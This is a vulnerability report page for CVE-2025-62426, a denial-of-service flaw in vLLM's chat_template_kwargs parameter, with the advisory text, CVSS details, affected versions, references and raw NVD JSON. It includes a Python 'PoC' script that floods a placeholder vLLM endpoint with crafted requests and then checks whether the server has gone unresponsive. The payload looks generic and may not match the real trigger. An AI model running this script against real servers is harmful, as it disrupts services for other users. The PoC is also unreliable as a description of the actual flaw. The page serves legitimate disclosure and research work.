Security Vulnerability Report
中文
CVE-2025-62426 CVSS 6.5 MEDIUM

CVE-2025-62426

Published: 2025-11-21 02:15:44
Last Modified: 2025-12-04 17:42:11

Description

vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE
vLLM >= 0.5.5 且 < 0.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS This PoC demonstrates the denial of service vulnerability in vLLM's chat_template_kwargs parameter handling. """ import requests import json import time import concurrent.futures TARGET_URL = "http://target-server:8000/v1/chat/completions" def trigger_dos(): """ Send a malicious request with crafted chat_template_kwargs to trigger long processing time. """ headers = { "Content-Type": "application/json", "Authorization": "Bearer YOUR_API_KEY" } # Craft malicious payload with problematic chat_template_kwargs payload = { "model": "meta-llama/Llama-3-8b", "messages": [ {"role": "user", "content": "Hello"} ], # Malicious chat_template_kwargs that triggers DoS "chat_template_kwargs": { "loop_trigger": True, "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}} } } try: response = requests.post( TARGET_URL, headers=headers, json=payload, timeout=5 ) print(f"Response status: {response.status_code}") except requests.exceptions.Timeout: print("Request timed out - DoS successful") except Exception as e: print(f"Error: {e}") def verify_dos(): """ Verify that the server is unresponsive after DoS attack. """ normal_payload = { "model": "meta-llama/Llama-3-8b", "messages": [{"role": "user", "content": "Hi"}] } try: response = requests.post( TARGET_URL, json=normal_payload, timeout=10 ) return response.status_code == 200 except: return False if __name__ == "__main__": print("[*] Starting CVE-2025-62426 DoS attack...") # Send multiple malicious requests with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: futures = [executor.submit(trigger_dos) for _ in range(3)] concurrent.futures.wait(futures) print("[*] Verifying server availability...") time.sleep(2) if not verify_dos(): print("[+] DoS confirmed - Server is unresponsive") else: print("[-] Server still responsive")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62426", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.570", "lastModified": "2025-12-04T17:42:10.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.5.5", "versionEndExcluding": "0.11.1", "matchCriteriaId": "BA1047E1-ED1E-4685-B699-8CE5B2058D87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27205", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}